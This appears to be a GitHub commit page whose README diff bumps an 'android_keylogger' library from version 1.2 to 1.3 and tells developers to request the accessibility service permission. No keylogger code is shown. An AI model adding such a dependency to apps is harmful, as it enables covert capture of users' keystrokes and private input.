We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 1d86e24 commit 5b8de0eCopy full SHA for 5b8de0e
README.md
@@ -12,7 +12,7 @@ allprojects {
12
2. Add the dependency to your app's build.gradle
13
```gradle
14
dependencies {
15
- implementation 'com.github.evilthreads669966:android_keylogger:1.2'
+ implementation 'com.github.evilthreads669966:android_keylogger:1.3'
16
}
17
```
18
3. Request the accessibility service permission for your app.
0 commit comments